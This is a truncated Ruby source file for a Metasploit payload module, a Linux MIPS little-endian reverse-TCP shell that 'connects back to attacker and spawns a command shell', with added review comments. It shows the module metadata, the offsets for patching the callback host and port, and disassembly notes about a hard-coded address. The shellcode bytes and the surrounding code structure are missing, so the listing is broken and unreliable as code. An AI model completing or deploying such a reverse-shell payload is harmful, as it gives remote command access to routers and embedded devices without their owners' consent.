# $Id$
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
# Written in a hurry using shellforge and my MIPS shellforge loader (avail. on cr0.org)
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
module Metasploit3
# Single payload mixin: consistent with the 'Inline' in the module's Name
# (one self-contained payload, no separate stage).
include Msf::Payload::Single
# Linux payload mixin from the framework; what it contributes is not visible
# in this file.
include Msf::Payload::Linux
# Registers the module metadata for a Linux reverse-TCP command shell payload
# targeting little-endian MIPS (ARCH_MIPSLE).
#
# NOTE(review): this listing looks truncated. The call that receives the
# entries below, the braces around the 'Payload' and 'Offsets' hashes, and the
# payload bytes themselves are not visible here, so only the visible entries
# are documented.
#
# @param info [Hash] extra module info supplied by the caller; defaults to {}
def initialize(info = {})
'Name' => 'Linux Command Shell, Reverse TCP Inline',
'Version' => '$Revision$',
'Description' => 'Connect back to attacker and spawn a command shell',
'Author' => 'Julien Tinnes',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE,
# The payload connects back, so it is paired with the reverse TCP handler and
# yields a command shell session.
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::CommandShell,
'Payload' =>
# Each 'Offsets' entry below is [byte offset into the payload, pack type].
'Offsets' =>
# FIXME: LHOST doesn't patch anything real; the host is fixed to the address
# hard-coded in the shellcode (C0A80109 below, i.e. 192.168.1.9).
# Consequence: whatever LHOST is configured, the generated payload still
# connects to that baked-in address. Anyone generating this payload for a
# test has to account for that, or the session goes to an unintended host.
# Get shellcode with String.cpu=Metasm::MIPS.new
# sc.decode
# (but Metasploit's version is buggy)
# We need to patch this: (C0A80109 = 192.168.1.9)
# The address is split across the immediates of two instructions: lui loads
# the upper half (-3f58h is C0A8h as a signed 16-bit value) and ori fills in
# the lower half (0109h). A single contiguous 4-byte 'ADDR' patch therefore
# cannot set it; the two halves would have to be patched separately.
# lui $t0, -3f58h ; @4ch 3c08c0a8
# ori $a2, $t0, 109h ; @50h 35060109
# NOTE(review): the disassembly comment above places the lui carrying the
# host's upper half at 4ch, and LPORT is patched at 0x4C as well. The payload
# bytes are not visible here, so confirm which offset really holds the port
# before relying on either value.
'LHOST' => [ 0x130, 'ADDR' ],
'LPORT' => [ 0x4C, 'n' ],
'Payload' =>
# FIXME: remove extra 0 bytes!
# (the payload bytes are not visible in this listing; per this FIXME they
# still contain NUL bytes)
end |